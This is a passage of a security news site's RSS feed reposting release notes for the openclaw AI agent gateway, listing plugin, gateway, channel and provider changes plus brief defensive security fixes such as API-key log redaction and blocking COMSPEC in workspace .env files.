<li>Gateway/config: include rejected validation paths in foreground and service last-known-good recovery logs plus main-agent notices, so unsupported direct edits explain which key caused restore instead of looking like silent reversion. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357904226" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75060" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75060/hovercard" href="https://github.com/openclaw/openclaw/issues/75060">#75060</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Plugins/runtime-deps: hash the OS-canonical <code>packageRoot</code> via <code>fs.realpathSync.native</code> (with <code>path.resolve</code> fallback) when computing the bundled runtime-deps stage key, so loader and channel <code>bundled-root</code> callers no longer derive divergent stage directories under <code>~/.openclaw/plugin-runtime-deps/openclaw-&lt;version&gt;-&lt;hash&gt;/</code> and bundled channels stop failing with <code>ENOENT</code> on shared dist chunks under Windows npm symlinks, junctions, or PM2 multi-instance worker layouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356458695" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74963" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74963/hovercard" href="https://github.com/openclaw/openclaw/issues/74963">#74963</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357655594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75048" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75048/hovercard" href="https://github.com/openclaw/openclaw/pull/75048">#75048</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/openperf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/openperf">@openperf</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>fix(logging): add redaction patterns for Tencent Cloud, Alibaba Cloud, HuggingFace and Replicate API keys (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176207505" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58162" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58162/hovercard" href="https://github.com/openclaw/openclaw/pull/58162">#58162</a>). Thanks @gavyngong</li>
<li>Pairing: surface unexpected allowlist filesystem stat errors instead of treating the allowlist as missing, so permission and I/O failures are visible during pairing authorization checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226978925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63324" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63324/hovercard" href="https://github.com/openclaw/openclaw/pull/63324">#63324</a>) Thanks @franciscomaestre.</li>
<li>macOS app: reserve layout space for exec approval command details so the allow dialog no longer overlaps the command, context, and action buttons. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363145435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75470" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75470/hovercard" href="https://github.com/openclaw/openclaw/pull/75470">#75470</a>) Thanks @ngutman.</li>
<li>Agents/failover: carry <code>sessionId</code>, <code>lane</code>, <code>provider</code>, <code>model</code>, and <code>profileId</code> attribution through <code>FailoverError</code> and <code>describeFailoverError</code>/<code>coerceToFailoverError</code> so structured error logs (e.g. <code>gateway.err.log</code> ingestion) can attribute exhausted-fallback wrapper errors to the originating session and last-attempted provider instead of dropping the metadata after the per-profile errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055391486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42713" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42713/hovercard" href="https://github.com/openclaw/openclaw/issues/42713">#42713</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342577768" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73506" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73506/hovercard" href="https://github.com/openclaw/openclaw/pull/73506">#73506</a>) Thanks @wenxu007.</li>
<li>Context Engine: treat assembled prompt as the default authority for preemptive overflow prechecks so engines that return a windowed, self-contained context no longer trigger false hard-fail compactions on huge raw history. Engines whose assembled view can hide overflow risk can opt back into the legacy behavior with <code>AssembleResult.promptAuthority: "preassembly_may_overflow"</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349382434" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74255" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74255/hovercard" href="https://github.com/openclaw/openclaw/pull/74255">#74255</a>) Thanks @100yenadmin.</li>
<li>Mattermost: refresh current native slash command registrations before accepting callbacks so stale tokens from deleted or regenerated commands stop being accepted without a gateway restart while failed validations stay briefly cached and lookup starts are rate-limited per command, gate each callback against the resolved command's own startup token so a token leaked for one slash command cannot poison another command's failure cache, redact slash validation lookup errors, and add a body read timeout to the multi-account routing path so slow callback senders cannot tie up the dispatcher. Thanks @feynman-hou and @eleqtrizit.</li>
<li>Security/dotenv: block <code>COMSPEC</code> in workspace <code>.env</code> so a malicious repo cannot redirect Windows <code>cmd.exe</code> resolution, and lock in case-insensitive workspace-<code>.env</code> regression coverage for the full Windows shell trust-root family (<code>COMSPEC</code>, <code>PROGRAMFILES</code>, <code>PROGRAMW6432</code>, <code>SYSTEMROOT</code>, <code>WINDIR</code>). (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351902035" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74460" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74460/hovercard" href="https://github.com/openclaw/openclaw/pull/74460">#74460</a>) Thanks @mmaps.</li>
<li>Gateway/install: drop stale version-manager and package-manager PATH entries preserved from old service files during <code>gateway install --force</code> and doctor repair, so the repair path no longer recreates <code>gateway-path-nonminimal</code> warnings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360586723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75220" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75220/hovercard" href="https://github.com/openclaw/openclaw/issues/75220">#75220</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363000761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75440" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75440/hovercard" href="https://github.com/openclaw/openclaw/pull/75440">#75440</a>) Thanks @leonaIee, @renaudcerrato, and @aaajiao.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.5.2-beta.3]]></title>
<description><![CDATA[2026.5.2
Highlights

External plugin installation now covers diagnostics, onboarding, doctor repair, channel setup, install/update records, and artifact metadata while keeping bare package installs on npm for the first cutover. Thanks @vincentkoc.
Gateway startup, session listing, task maintenanc...]]></description>
<link>https://tsecurity.de/de/3482880/downloads/openclaw-202652-beta3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3482880/downloads/openclaw-202652-beta3/</guid>
<pubDate>Sun, 03 May 2026 00:16:39 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.2</h2>
<h3>Highlights</h3>
<ul>
<li>External plugin installation now covers diagnostics, onboarding, doctor repair, channel setup, install/update records, and artifact metadata while keeping bare package installs on npm for the first cutover. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway startup, session listing, task maintenance, prompt prep, plugin loading, and filesystem hot paths get targeted cache and fanout reductions for large or plugin-heavy installs.</li>
<li>Control UI and WebChat reliability improves across Sessions, Cron, long-running Gateway WebSockets, grouped-message width, slash-command feedback, iOS PWA bounds, selection contrast, and Talk diagnostics.</li>
<li>Channel and provider fixes cover Telegram topic commands and networking, Discord delivery and startup edge cases, OpenAI-compatible TTS/Realtime, OpenRouter/DeepSeek replay, Anthropic-compatible streaming, Brave/SearXNG/Firecrawl web search, and voice-call routing.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>
<p>Gateway/startup: skip plugin-backed auth-profile overlays during startup secrets preflight, reducing gateway readiness latency while keeping reload and OAuth recovery paths overlay-capable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285812464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68327" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68327/hovercard" href="https://github.com/openclaw/openclaw/pull/68327">#68327</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JIRBOY/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JIRBOY">@JIRBOY</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: make diagnostics, onboarding, doctor repair, and channel setup carry ClawPack metadata through install records while keeping explicit <code>clawhub:</code> installs on ClawHub and bare package installs on npm for the launch cutover. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/CLI: include package dependency install state in <code>openclaw plugins list --json</code> so scripts can spot missing plugin dependencies without runtime-loading plugins.</p>
</li>
<li>
<p>Plugins/runtime: scope broad runtime preloads to the effective plugin ids derived from config, startup planning, configured channels, slots, and auto-enable rules instead of importing every discoverable plugin.</p>
</li>
<li>
<p>Agents/runtime: reuse the startup-loaded plugin registry for request-time providers, tools, channel actions, web/capability/memory/migration helpers, and memoized provider extra-params so stable embedded-run inputs no longer repeat plugin registry resolution while model-specific transport hook patches stay isolated. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Agents/runtime: memoize transcript replay-policy resolution for stable config and process-env runs while preserving custom-env provider hook behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Infra/path-guards: add a fast path for canonical absolute POSIX containment checks, avoiding repeated <code>path.resolve</code> and <code>path.relative</code> work in hot filesystem walkers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367529908" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75895" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75895/hovercard" href="https://github.com/openclaw/openclaw/issues/75895">#75895</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363840300" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75575" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75575/hovercard" href="https://github.com/openclaw/openclaw/issues/75575">#75575</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289737301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68782" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68782/hovercard" href="https://github.com/openclaw/openclaw/issues/68782">#68782</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Enderfga/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Enderfga">@Enderfga</a>.</p>
</li>
<li>
<p>Tools: add a platform-level tool descriptor planner for descriptor-first visibility, generic availability checks, and executor references. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Plugins/tools: cache plugin tool descriptors captured from <code>api.registerTool(...)</code> so repeated prompt-time planning can skip plugin runtime loading while execution still loads the live plugin tool. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368991903" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76079" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76079/hovercard" href="https://github.com/openclaw/openclaw/pull/76079">#76079</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Docs/Codex: clarify that ChatGPT/Codex subscription setups should use <code>openai/gpt-*</code> with <code>agentRuntime.id: "codex"</code> for native Codex runtime, while <code>openai-codex/*</code> remains the PI OAuth route. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Plugins/source checkout: load bundled plugins from the <code>extensions/*</code> pnpm workspace tree in source checkouts, so plugin-local dependencies and edits are used directly while packaged installs keep using the built runtime tree. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: externalize ACPX behind the official <code>@openclaw/acpx</code> package so packaged installs keep ACP harness adapter binaries out of core until the ACP backend is installed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: externalize diagnostics OpenTelemetry behind the official <code>@openclaw/diagnostics-otel</code> package so packaged installs keep the OTEL dependency stack out of core until the plugin is installed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare Google Chat, LINE, Matrix, and Mattermost for <code>2026.5.1-beta.2</code> npm and ClawHub publishing, and keep publishable plugin dist trees out of the core npm package. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare BlueBubbles, diagnostics Prometheus, Google Meet, Nextcloud Talk, Nostr, Zalo, and Zalo Personal for <code>2026.5.1-beta.2</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare diagnostics OpenTelemetry, Discord, Diffs, Lobster, Memory LanceDB, Microsoft Teams, QQ Bot, Voice Call, and WhatsApp for <code>2026.5.1-beta.1</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/beta: prepare Brave, Codex, Feishu, Synology Chat, Tlon, and Twitch for <code>2026.5.1-beta.1</code> npm and ClawHub publishing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Providers/xAI: add Grok 4.3 to the bundled catalog and make it the default xAI chat model.</p>
</li>
<li>
<p>Google Meet: let API-created rooms set <code>accessType</code> and <code>entryPointAccess</code>, and add <code>googlemeet end-active-conference</code> for closing managed spaces after a call. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355261280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74824" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74824/hovercard" href="https://github.com/openclaw/openclaw/pull/74824">#74824</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BsnizND/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BsnizND">@BsnizND</a>.</p>
</li>
<li>
<p>Google Meet: add <code>googlemeet test-listen</code> and the matching <code>google_meet</code> <code>test_listen</code> action so transcribe-mode joins wait for real caption or transcript movement before reporting listen-first health. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: prefer versioned ClawPack artifacts when ClawHub publishes digest metadata, verifying the ClawPack response header and downloaded bytes before installing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: persist ClawPack digest metadata on ClawHub plugin install and update records so registry refreshes and download verification can reuse stored artifact facts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: allow official bundled-plugin cutovers to record ClawHub artifact metadata while preserving npm as the launch default for bare package specs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/onboarding: allow install-on-demand provider setup entries to persist ClawHub artifact metadata after explicit ClawHub installs while retaining npm/local fallback paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/Crestodian: add ClawHub plugin search plus Crestodian plugin list/search/install/uninstall operations, with approval and audit coverage for install and uninstall.</p>
</li>
<li>
<p>Channels/thread bindings: replace split subagent/ACP thread-spawn toggles with <code>threadBindings.spawnSessions</code>, default thread-bound spawns on, and let <code>openclaw doctor --fix</code> migrate the legacy keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367850512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75943" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75943/hovercard" href="https://github.com/openclaw/openclaw/pull/75943">#75943</a>)</p>
</li>
<li>
<p>Providers/OpenAI: add <code>extraBody</code>/<code>extra_body</code> passthrough for OpenAI-compatible TTS endpoints, so custom speech servers can receive fields such as <code>lang</code> in <code>/audio/speech</code> requests. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4041341848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/39900" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/39900/hovercard" href="https://github.com/openclaw/openclaw/issues/39900">#39900</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/R3NK0R/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/R3NK0R">@R3NK0R</a>.</p>
</li>
<li>
<p>Dependencies: refresh workspace dependency pins, including TypeBox 1.1.37, AWS SDK 3.1041.0, Microsoft Teams 2.0.9, and Marked 18.0.3. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>, <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/aws/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aws">@aws</a>, and <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/microsoft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/microsoft">@microsoft</a>.</p>
</li>
<li>
<p>Discord/channels: add reusable message-channel access groups plus Discord channel-audience DM authorization, so allowlists can reference <code>accessGroup:&lt;name&gt;</code> across channel auth paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366657956" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75813" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75813/hovercard" href="https://github.com/openclaw/openclaw/pull/75813">#75813</a>)</p>
</li>
<li>
<p>Crabbox/scripts: print the selected Crabbox binary, version, and supported providers before <code>pnpm crabbox:*</code> commands, and reject stale binaries that lack <code>blacksmith-testbox</code> provider support.</p>
</li>
<li>
<p>Agents/Codex: add committed happy-path prompt snapshots for Codex/message-tool Telegram direct, Discord group, and heartbeat turns so prompt drift can be reviewed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</p>
</li>
<li>
<p>Dependencies: refresh bundled runtime and plugin dependency pins, including Pi 0.71.1, OpenAI 6.35.0, Codex 0.128.0, Zod 4.4.1, and Matrix 41.4.0. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Agents/workspace: add <code>agents.defaults.skipOptionalBootstrapFiles</code> for skipping selected optional workspace files during bootstrap without disabling required workspace setup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213876746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62110" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62110/hovercard" href="https://github.com/openclaw/openclaw/pull/62110">#62110</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mainstay22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mainstay22">@mainstay22</a>.</p>
</li>
<li>
<p>Plugins/CLI: add first-class <code>git:</code> plugin installs with ref checkout, commit metadata, normal scanner/staging, and <code>plugins update</code> support for recorded git sources. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/badlogic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/badlogic">@badlogic</a>.</p>
</li>
<li>
<p>Google Meet: add live caption health for Chrome transcribe mode, including caption observer state, transcript counters, last caption text, and recent transcript lines in status and doctor output. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Voice Call/Google Meet: add Twilio Meet join phase logs around pre-connect DTMF, realtime stream setup, and initial greeting handoff for easier live-call debugging. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>macOS app: move recent session context rows into a Context submenu while keeping usage and cost details root-level, so the menu bar companion stays compact with many active sessions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Guti/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Guti">@Guti</a>.</p>
</li>
<li>
<p>Gateway/SDK: add SDK-facing tools.invoke RPC with shared HTTP policy, typed approval/refusal results, and SDK helper support. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354626015" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74705/hovercard" href="https://github.com/openclaw/openclaw/issues/74705">#74705</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a>.</p>
</li>
<li>
<p>Discord: keep active buttons, selects, and forms working across Gateway restarts until they expire, so multi-step Discord interactions are less likely to break during upgrades or restarts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Messages/docs: clarify that <code>BodyForAgent</code> is the primary inbound model text while <code>Body</code> is the legacy envelope fallback, and add Signal coverage so channel hardening patches target the real prompt path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258357958" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66198" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66198/hovercard" href="https://github.com/openclaw/openclaw/pull/66198">#66198</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/defonota3box/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/defonota3box">@defonota3box</a>.</p>
</li>
<li>
<p>Slack: publish a safe default App Home tab view on <code>app_home_opened</code> and include the Home tab event in setup manifests. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3911903854" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11655" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11655/hovercard" href="https://github.com/openclaw/openclaw/issues/11655">#11655</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4114456932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52020" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52020/hovercard" href="https://github.com/openclaw/openclaw/issues/52020">#52020</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</p>
</li>
<li>
<p>Slack: keep track of bot-participated threads across restarts, so ongoing threaded conversations can continue auto-replying after the Gateway is restarted. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Control UI/Usage: add UTC quarter-hour token buckets for the Usage Mosaic and reuse them for hour filtering, keeping the legacy session-span fallback for older summaries. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350628281" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74337" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74337/hovercard" href="https://github.com/openclaw/openclaw/pull/74337">#74337</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konanok/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konanok">@konanok</a>.</p>
</li>
<li>
